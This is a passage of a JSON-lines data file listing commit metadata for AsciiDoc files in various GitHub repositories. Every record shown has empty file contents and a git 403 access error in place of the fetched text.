2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","new_file":"_posts\/2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cbe2f29784d0908fe7c3a4bdfa5ee343664086a4","subject":"Update 2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","message":"Update 2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","new_file":"_posts\/2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cab9285199f615585323674ba4ebbbe467d98a2a","subject":"Update 2015-09-13-Lets-talk-about-mitigation.adoc","message":"Update 2015-09-13-Lets-talk-about-mitigation.adoc","repos":"suedadam\/suedadam.github.io,suedadam\/suedadam.github.io,suedadam\/suedadam.github.io","old_file":"_posts\/2015-09-13-Lets-talk-about-mitigation.adoc","new_file":"_posts\/2015-09-13-Lets-talk-about-mitigation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/suedadam\/suedadam.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"310a271771f2a5fcdc65fa2e86d74f19c2de0884","subject":"Update 2016-03-20-Comment-arreter-de-ronfler.adoc","message":"Update 2016-03-20-Comment-arreter-de-ronfler.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-20-Comment-arreter-de-ronfler.adoc","new_file":"_posts\/2016-03-20-Comment-arreter-de-ronfler.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"315fbd86d2bf16a3762b8bcdc86d525e9fd22c69","subject":"Update 2014-09-23-Announcing-try-racketorg.adoc","message":"Update 2014-09-23-Announcing-try-racketorg.adoc","repos":"jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io","old_file":"_posts\/2014-09-23-Announcing-try-racketorg.adoc","new_file":"_posts\/2014-09-23-Announcing-try-racketorg.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jarcane\/jarcane.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3207e9ad785dc615ab4bca5138ef6fa1e6f9c0e2","subject":"Update 2015-11-18-New-in-the-family-part-2.adoc","message":"Update 2015-11-18-New-in-the-family-part-2.adoc","repos":"evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io","old_file":"_posts\/2015-11-18-New-in-the-family-part-2.adoc","new_file":"_posts\/2015-11-18-New-in-the-family-part-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/evolgenomology\/evolgenomology.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7e7ac94a0222b744ea45901cab8d18cea673ad40","subject":"Update 2017-07-22-Acemice-Belki-Hadsizce-4.adoc","message":"Update 2017-07-22-Acemice-Belki-Hadsizce-4.adoc","repos":"Aferide\/Aferide.github.io,Aferide\/Aferide.github.io,Aferide\/Aferide.github.io,Aferide\/Aferide.github.io","old_file":"_posts\/2017-07-22-Acemice-Belki-Hadsizce-4.adoc","new_file":"_posts\/2017-07-22-Acemice-Belki-Hadsizce-4.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Aferide\/Aferide.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b312063922eda1314d33a350dc4b1a1e3a0df7ca","subject":"Update 2016-10-25-Test-2.adoc","message":"Update 2016-10-25-Test-2.adoc","repos":"lxjk\/lxjk.github.io,lxjk\/lxjk.github.io,lxjk\/lxjk.github.io,lxjk\/lxjk.github.io","old_file":"_posts\/2016-10-25-Test-2.adoc","new_file":"_posts\/2016-10-25-Test-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lxjk\/lxjk.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"755d6b0d1fc3aee3d950e6c29b5fa8e18f6f8f5a","subject":"Create InstallCygwin.adoc","message":"Create InstallCygwin.adoc","repos":"igagis\/svgren,igagis\/svgren,igagis\/svgren","old_file":"wiki\/InstallCygwin.adoc","new_file":"wiki\/InstallCygwin.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/igagis\/svgren.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"14fbd053283d6793bab75afb47df653b4925eafa","subject":"Update 2018-02-14-dialog-element-Modals-for-the-future.adoc","message":"Update 2018-02-14-dialog-element-Modals-for-the-future.adoc","repos":"prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io","old_file":"_posts\/2018-02-14-dialog-element-Modals-for-the-future.adoc","new_file":"_posts\/2018-02-14-dialog-element-Modals-for-the-future.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/prateekjadhwani\/prateekjadhwani.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0e3a55b81773007440d3bd7e5c4f44dabc8fdb18","subject":"Update 2016-02-16-All-Important-Context-Maps.adoc","message":"Update 2016-02-16-All-Important-Context-Maps.adoc","repos":"jmelfi\/jmelfi.github.io,jmelfi\/jmelfi.github.io,jmelfi\/jmelfi.github.io,jmelfi\/jmelfi.github.io","old_file":"_posts\/2016-02-16-All-Important-Context-Maps.adoc","new_file":"_posts\/2016-02-16-All-Important-Context-Maps.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jmelfi\/jmelfi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"42e141eeab1ed8b13940440438db800e7ccdfd09","subject":"Update 2016-02-04-Reformer-lorthographe-est-ce-necessaire.adoc","message":"Update 2016-02-04-Reformer-lorthographe-est-ce-necessaire.adoc","repos":"inedit-reporter\/inedit-reporter.github.io,inedit-reporter\/inedit-reporter.github.io,inedit-reporter\/inedit-reporter.github.io","old_file":"_posts\/2016-02-04-Reformer-lorthographe-est-ce-necessaire.adoc","new_file":"_posts\/2016-02-04-Reformer-lorthographe-est-ce-necessaire.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/inedit-reporter\/inedit-reporter.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"793228cb5c31751a59a27ce7fc7eee33d45ea4d6","subject":"Update 2016-03-03-Meine-Erlebnisse-bei-der-der-Mittwochskommentarrunde.adoc","message":"Update 2016-03-03-Meine-Erlebnisse-bei-der-der-Mittwochskommentarrunde.adoc","repos":"AlexL777\/hubpressblog,AlexL777\/hubpressblog,AlexL777\/hubpressblog,AlexL777\/hubpressblog","old_file":"_posts\/2016-03-03-Meine-Erlebnisse-bei-der-der-Mittwochskommentarrunde.adoc","new_file":"_posts\/2016-03-03-Meine-Erlebnisse-bei-der-der-Mittwochskommentarrunde.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/AlexL777\/hubpressblog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0509b41865f156c8ab2bf64efa2d4941950e6ea8","subject":"Update 2018-03-06-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-N-A-T.adoc","message":"Update 2018-03-06-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-N-A-T.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-03-06-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-N-A-T.adoc","new_file":"_posts\/2018-03-06-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-N-A-T.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3efff95e59b9fb45df70e4ae76944f15c5d0c4d3","subject":"Update 2016-06-28-Adding-static-pages-to-a-hubpress-blog.adoc","message":"Update 2016-06-28-Adding-static-pages-to-a-hubpress-blog.adoc","repos":"iveskins\/iveskins.github.io,iveskins\/iveskins.github.io,iveskins\/iveskins.github.io,iveskins\/iveskins.github.io","old_file":"_posts\/2016-06-28-Adding-static-pages-to-a-hubpress-blog.adoc","new_file":"_posts\/2016-06-28-Adding-static-pages-to-a-hubpress-blog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/iveskins\/iveskins.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6fa07f1e3f310cf4f04e6896ccd8750285d33914","subject":"create post The DIY Jacket Upgrade, Thank Me Later","message":"create post The DIY Jacket Upgrade, Thank Me Later","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-26-The-DIY-Jacket-Upgrade,-Thank-Me-Later.adoc","new_file":"_posts\/2018-02-26-The-DIY-Jacket-Upgrade,-Thank-Me-Later.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9cdea9d001a8da441054785a342728227656a208","subject":"review pass, cleanup of work history section","message":"review pass, cleanup of work history section\n\nSigned-off-by: Dan Mack <f52cae7d677fd8a83ac7cc4406c1d073a69a7b23@macktronics.com>\n","repos":"danmack\/resume","old_file":"workhist.adoc","new_file":"workhist.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/danmack\/resume.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"62e6e23c2e1eb46d8a3f98d122498757e76c56ae","subject":"y2b create post Henge Docks Air Dock Hands On CES 2012","message":"y2b create post Henge Docks Air Dock Hands On CES 2012","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-01-12-Henge-Docks-Air-Dock-Hands-On-CES-2012.adoc","new_file":"_posts\/2012-01-12-Henge-Docks-Air-Dock-Hands-On-CES-2012.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6e5a58c31efbb4cc83c65517a1cf335d12154b94","subject":"Update 2016-08-25-Tmux-Kung-fu.adoc","message":"Update 2016-08-25-Tmux-Kung-fu.adoc","repos":"faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io","old_file":"_posts\/2016-08-25-Tmux-Kung-fu.adoc","new_file":"_posts\/2016-08-25-Tmux-Kung-fu.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faldah\/faldah.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3717e98a603e6106c7c80519064ecdf24ff1a1fe","subject":"y2b create post PlayStation VR + Xbox One = Will It Work?","message":"y2b create post PlayStation VR + Xbox One = Will It Work?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-10-23-PlayStation-VR--Xbox-One--Will-It-Work.adoc","new_file":"_posts\/2016-10-23-PlayStation-VR--Xbox-One--Will-It-Work.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cff0764226a0a9eca1e872db0069064324318133","subject":"Update 2015-05-18-uGUI.adoc","message":"Update 2015-05-18-uGUI.adoc","repos":"TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io","old_file":"_posts\/2015-05-18-uGUI.adoc","new_file":"_posts\/2015-05-18-uGUI.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TheGertproject\/TheGertproject.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c124fd01fe95466474640a3adb509d781e084aa9","subject":"Update 2011-05-05-Audit-automatique-avec-Play-Framework.adoc","message":"Update 2011-05-05-Audit-automatique-avec-Play-Framework.adoc","repos":"jcsirot\/hubpress.io,jcsirot\/hubpress.io,jcsirot\/hubpress.io,jcsirot\/hubpress.io","old_file":"_posts\/2011-05-05-Audit-automatique-avec-Play-Framework.adoc","new_file":"_posts\/2011-05-05-Audit-automatique-avec-Play-Framework.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jcsirot\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"72378aca17f704f917b2925a0d1a7d711627d70c","subject":"kata-spring-restdocs","message":"kata-spring-restdocs\n","repos":"Accordance\/microservice-dojo,Accordance\/microservice-dojo,Accordance\/microservice-dojo,Accordance\/microservice-dojo","old_file":"guides\/src\/kata-spring-restdocs\/spring-restdoc-intro.adoc","new_file":"guides\/src\/kata-spring-restdocs\/spring-restdoc-intro.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Accordance\/microservice-dojo.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f97d288954ad94861386d5c32ab410487ac89ad5","subject":"Update 2016-07-26-Episode-66-No-Good-Gottliebs-Premier.adoc","message":"Update 2016-07-26-Episode-66-No-Good-Gottliebs-Premier.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2016-07-26-Episode-66-No-Good-Gottliebs-Premier.adoc","new_file":"_posts\/2016-07-26-Episode-66-No-Good-Gottliebs-Premier.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4936cb503c8a3547df0b03fbe6c2be0f36267c75","subject":"Removing trailing whitespaces","message":"Removing trailing whitespaces","repos":"destijl\/artifacts,crankyoldgit\/artifacts,sebastianwelsh\/artifacts,crankyoldgit\/artifacts,sebastianwelsh\/artifacts,destijl\/artifacts,keithtyler\/artifacts,vonnopsled\/artifacts,pidydx\/artifacts,pidydx\/artifacts,vonnopsled\/artifacts,keithtyler\/artifacts","old_file":"docs\/Artifacts definition format and style guide.asciidoc","new_file":"docs\/Artifacts definition format and style guide.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/crankyoldgit\/artifacts.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2c01d1e249b0a0893e31550c9be8d0074f38516a","subject":"Added Camel 2.18.5 release notes to docs","message":"Added Camel 2.18.5 release notes to docs\n","repos":"cunningt\/camel,DariusX\/camel,kevinearls\/camel,tdiesler\/camel,jamesnetherton\/camel,jamesnetherton\/camel,gnodet\/camel,christophd\/camel,onders86\/camel,nicolaferraro\/camel,jamesnetherton\/camel,punkhorn\/camel-upstream,sverkera\/camel,anoordover\/camel,Fabryprog\/camel,tdiesler\/camel,alvinkwekel\/camel,sverkera\/camel,pax95\/camel,davidkarlsen\/camel,objectiser\/camel,adessaigne\/camel,christophd\/camel,Fabryprog\/camel,davidkarlsen\/camel,tadayosi\/camel,alvinkwekel\/camel,CodeSmell\/camel,cunningt\/camel,mcollovati\/camel,gnodet\/camel,apache\/camel,mcollovati\/camel,punkhorn\/camel-upstream,objectiser\/camel,anoordover\/camel,CodeSmell\/camel,Fabryprog\/camel,ullgren\/camel,sverkera\/camel,nikhilvibhav\/camel,CodeSmell\/camel,objectiser\/camel,adessaigne\/camel,onders86\/camel,zregvart\/camel,anoordover\/camel,mcollovati\/camel,cunningt\/camel,jamesnetherton\/camel,Fabryprog\/camel,christophd\/camel,anoordover\/camel,tdiesler\/camel,kevinearls\/camel,apache\/camel,punkhorn\/camel-upstream,alvinkwekel\/camel,nicolaferraro\/camel,christophd\/camel,pmoerenhout\/camel,objectiser\/camel,sverkera\/camel,kevinearls\/camel,ullgren\/camel,apache\/camel,nikhilvibhav\/camel,pmoerenhout\/camel,christophd\/camel,christophd\/camel,anoordover\/camel,adessaigne\/camel,ullgren\/camel,zregvart\/camel,adessaigne\/camel,tdiesler\/camel,tadayosi\/camel,pax95\/camel,nikhilvibhav\/camel,adessaigne\/camel,tadayosi\/camel,pax95\/camel,gnodet\/camel,kevinearls\/camel,alvinkwekel\/camel,apache\/camel,pmoerenhout\/camel,sverkera\/camel,nicolaferraro\/camel,tdiesler\/camel,tadayosi\/camel,pax95\/camel,pax95\/camel,pmoerenhout\/camel,jamesnetherton\/camel,gnodet\/camel,anoordover\/camel,zregvart\/camel,sverkera\/camel,jamesnetherton\/camel,tadayosi\/camel,CodeSmell\/camel,kevinearls\/camel,cunningt\/camel,mcollovati\/camel,DariusX\/camel,cunningt\/camel,nicolaferraro\/camel,pax95\/camel,cunningt\/camel,apache\/camel,tadayosi\/camel,zregvart\/camel,nikhilvibhav\/camel,onders86\/camel,onders86\/camel,tdiesler\/camel,davidkarlsen\/camel,pmoerenhout\/camel,DariusX\/camel,adessaigne\/camel,kevinearls\/camel,onders86\/camel,davidkarlsen\/camel,pmoerenhout\/camel,DariusX\/camel,onders86\/camel,apache\/camel,ullgren\/camel,gnodet\/camel,punkhorn\/camel-upstream","old_file":"docs\/user-manual\/en\/release-notes\/camel-2185-release.adoc","new_file":"docs\/user-manual\/en\/release-notes\/camel-2185-release.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"235abc30f4408805c1e2ce6e32bd646dc048dbc7","subject":"Add Sednit README","message":"Add Sednit README\n","repos":"eset\/malware-ioc,eset\/malware-ioc","old_file":"sednit\/README.adoc","new_file":"sednit\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/eset\/malware-ioc.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"61724bcf68462cf505b9e07c52f80114b367fe77","subject":"Update 2016-06-10-Testing-A-N-N-libraries.adoc","message":"Update 2016-06-10-Testing-A-N-N-libraries.adoc","repos":"erramuzpe\/gsoc2016,erramuzpe\/gsoc2016,erramuzpe\/gsoc2016,erramuzpe\/gsoc2016","old_file":"_posts\/2016-06-10-Testing-A-N-N-libraries.adoc","new_file":"_posts\/2016-06-10-Testing-A-N-N-libraries.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/erramuzpe\/gsoc2016.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b0d18aa5f8dc0310915ed5e73460c1fc8dc386ee","subject":"Update 2017-08-24-Mein-erster-Blogeintrag.adoc","message":"Update 2017-08-24-Mein-erster-Blogeintrag.adoc","repos":"cmolitor\/blog,cmolitor\/blog,cmolitor\/blog,cmolitor\/blog","old_file":"_posts\/2017-08-24-Mein-erster-Blogeintrag.adoc","new_file":"_posts\/2017-08-24-Mein-erster-Blogeintrag.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmolitor\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c77e9bf1b0feb61d538512545eb02b9cf92647b4","subject":"Fixes on doc","message":"Fixes on doc\n","repos":"endurox-dev\/endurox,endurox-dev\/endurox,endurox-dev\/endurox,endurox-dev\/endurox","old_file":"doc\/api\/xatmi\/tpsend.adoc","new_file":"doc\/api\/xatmi\/tpsend.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/endurox-dev\/endurox.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"83cc2ec79bfe61bdbc83f82aa2a43f3d08c824bb","subject":"Update technical-manual.adoc","message":"Update technical-manual.adoc","repos":"uclouvain\/osis,uclouvain\/osis,uclouvain\/OSIS-Louvain,uclouvain\/osis,uclouvain\/osis,uclouvain\/OSIS-Louvain,uclouvain\/OSIS-Louvain","old_file":"doc\/technical-manual.adoc","new_file":"doc\/technical-manual.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/uclouvain\/osis.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"71ba977dad7cc6a6875fa5cc3bae3ecec923f62c","subject":"Fix package name in manual code","message":"Fix package name in manual code\n","repos":"pwheel\/spring-security,MatthiasWinzeler\/spring-security,djechelon\/spring-security,wkorando\/spring-security,olezhuravlev\/spring-security,hippostar\/spring-security,zgscwjm\/spring-security,pkdevbox\/spring-security,adairtaosy\/spring-security,tekul\/spring-security,chinazhaoht\/spring-security,jmnarloch\/spring-security,cyratech\/spring-security,jgrandja\/spring-security,driftman\/spring-security,spring-projects\/spring-security,zgscwjm\/spring-security,Peter32\/spring-security,likaiwalkman\/spring-security,Xcorpio\/spring-security,adairtaosy\/spring-security,chinazhaoht\/spring-security,wkorando\/spring-security,kazuki43zoo\/spring-security,raindev\/spring-security,xingguang2013\/spring-security,eddumelendez\/spring-security,ollie314\/spring-security,Krasnyanskiy\/spring-security,Xcorpio\/spring-security,jgrandja\/spring-security,caiwenshu\/spring-security,raindev\/spring-security,follow99\/spring-security,djechelon\/spring-security,zshift\/spring-security,caiwenshu\/spring-security,adairtaosy\/spring-security,MatthiasWinzeler\/spring-security,zhaoqin102\/spring-security,Krasnyanskiy\/spring-security,Krasnyanskiy\/spring-security,panchenko\/spring-security,fhanik\/spring-security,liuguohua\/spring-security,ractive\/spring-security,diegofernandes\/spring-security,zhaoqin102\/spring-security,liuguohua\/spring-security,diegofernandes\/spring-security,zhaoqin102\/spring-security,Peter32\/spring-security,MatthiasWinzeler\/spring-security,olezhuravlev\/spring-security,tekul\/spring-security,pwheel\/spring-security,spring-projects\/spring-security,spring-projects\/spring-security,forestqqqq\/spring-security,rwinch\/spring-security,caiwenshu\/spring-security,ollie314\/spring-security,jmnarloch\/spring-security,yinhe402\/spring-security,izeye\/spring-security,mrkingybc\/spring-security,hippostar\/spring-security,tekul\/spring-security,djechelon\/spring-security,mdeinum\/spring-security,panchenko\/spring-security,kazuki43zoo\/spring-security,follow99\/spring-security,cyratech\/spring-security,olezhuravlev\/spring-security,vitorgv\/spring-security,wkorando\/spring-security,mparaz\/spring-security,mrkingybc\/spring-security,yinhe402\/spring-security,raindev\/spring-security,SanjayUser\/SpringSecurityPro,kazuki43zoo\/spring-security,SanjayUser\/SpringSecurityPro,vitorgv\/spring-security,MatthiasWinzeler\/spring-security,zhaoqin102\/spring-security,spring-projects\/spring-security,vitorgv\/spring-security,panchenko\/spring-security,ajdinhedzic\/spring-security,rwinch\/spring-security,hippostar\/spring-security,mounb\/spring-security,thomasdarimont\/spring-security,jmnarloch\/spring-security,fhanik\/spring-security,ollie314\/spring-security,spring-projects\/spring-security,zshift\/spring-security,pkdevbox\/spring-security,fhanik\/spring-security,kazuki43zoo\/spring-security,izeye\/spring-security,djechelon\/spring-security,driftman\/spring-security,xingguang2013\/spring-security,diegofernandes\/spring-security,zshift\/spring-security,panchenko\/spring-security,pkdevbox\/spring-security,eddumelendez\/spring-security,pwheel\/spring-security,ractive\/spring-security,eddumelendez\/spring-security,tekul\/spring-security,jgrandja\/spring-security,liuguohua\/spring-security,yinhe402\/spring-security,fhanik\/spring-security,SanjayUser\/SpringSecurityPro,diegofernandes\/spring-security,jmnarloch\/spring-security,cyratech\/spring-security,xingguang2013\/spring-security,chinazhaoht\/spring-security,spring-projects\/spring-security,eddumelendez\/spring-security,pkdevbox\/spring-security,adairtaosy\/spring-security,Peter32\/spring-security,chinazhaoht\/spring-security,zshift\/spring-security,mdeinum\/spring-security,rwinch\/spring-security,zgscwjm\/spring-security,mounb\/spring-security,likaiwalkman\/spring-security,rwinch\/spring-security,forestqqqq\/spring-security,SanjayUser\/SpringSecurityPro,likaiwalkman\/spring-security,jgrandja\/spring-security,jgrandja\/spring-security,ollie314\/spring-security,driftman\/spring-security,eddumelendez\/spring-security,mrkingybc\/spring-security,Xcorpio\/spring-security,djechelon\/spring-security,Peter32\/spring-security,forestqqqq\/spring-security,SanjayUser\/SpringSecurityPro,spring-projects\/spring-security,follow99\/spring-security,wkorando\/spring-security,Xcorpio\/spring-security,fhanik\/spring-security,mounb\/spring-security,mounb\/spring-security,ajdinhedzic\/spring-security,thomasdarimont\/spring-security,rwinch\/spring-security,likaiwalkman\/spring-security,olezhuravlev\/spring-security,raindev\/spring-security,follow99\/spring-security,thomasdarimont\/spring-security,driftman\/spring-security,mparaz\/spring-security,vitorgv\/spring-security,rwinch\/spring-security,liuguohua\/spring-security,olezhuravlev\/spring-security,zgscwjm\/spring-security,cyratech\/spring-security,pwheel\/spring-security,izeye\/spring-security,pwheel\/spring-security,ractive\/spring-security,caiwenshu\/spring-security,forestqqqq\/spring-security,kazuki43zoo\/spring-security,ajdinhedzic\/spring-security,fhanik\/spring-security,ajdinhedzic\/spring-security,mparaz\/spring-security,thomasdarimont\/spring-security,mparaz\/spring-security,mdeinum\/spring-security,hippostar\/spring-security,mdeinum\/spring-security,mrkingybc\/spring-security,ractive\/spring-security,thomasdarimont\/spring-security,yinhe402\/spring-security,Krasnyanskiy\/spring-security,jgrandja\/spring-security,izeye\/spring-security,xingguang2013\/spring-security","old_file":"docs\/manual\/src\/asciidoc\/index.adoc","new_file":"docs\/manual\/src\/asciidoc\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jmnarloch\/spring-security.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6d71c5f4de96535dccdfc996faddac47258542c1","subject":"Asciidoc link","message":"Asciidoc link\n","repos":"funcool\/cats,yurrriq\/cats,alesguzik\/cats,tcsavage\/cats,OlegTheCat\/cats,mccraigmccraig\/cats","old_file":"doc\/cats.asciidoc","new_file":"doc\/cats.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/yurrriq\/cats.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"77fe0314e0abef1ee4faa490496644ee456476e1","subject":"add vendoring code","message":"add vendoring code\n","repos":"ttroy50\/cmake-examples,ttroy50\/cmake-examples,ttroy50\/cmake-examples","old_file":"07-package-management\/B-vendoring-code\/README.adoc","new_file":"07-package-management\/B-vendoring-code\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ttroy50\/cmake-examples.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ab1b8b0b4e0238f9e454e90e8acbeb3a6dbf90b1","subject":"Update 2016-04-16-google-analytics-with-google-apps-script.adoc","message":"Update 2016-04-16-google-analytics-with-google-apps-script.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-04-16-google-analytics-with-google-apps-script.adoc","new_file":"_posts\/2016-04-16-google-analytics-with-google-apps-script.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 